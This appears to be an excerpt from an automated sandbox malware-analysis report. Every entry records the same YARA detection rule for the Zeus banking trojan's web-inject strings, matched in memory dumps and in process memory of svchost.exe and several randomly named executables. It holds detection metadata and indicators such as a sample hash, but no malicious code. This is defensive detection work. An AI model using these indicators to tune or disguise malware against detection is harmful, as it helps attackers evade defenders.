Source: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2088591684.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2085749007.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2107473137.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2107627120.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2107190009.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.1664876030.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2100321942.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2064074801.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2106495197.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2046920489.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2082103389.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2103873411.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2060038870.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2086084822.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2033279627.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2090984983.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2099961240.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: Bonelessness.exe PID: 6696, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6260, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6216, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 3496, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7140, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7124, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7088, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7064, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7040, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7024, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7008, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
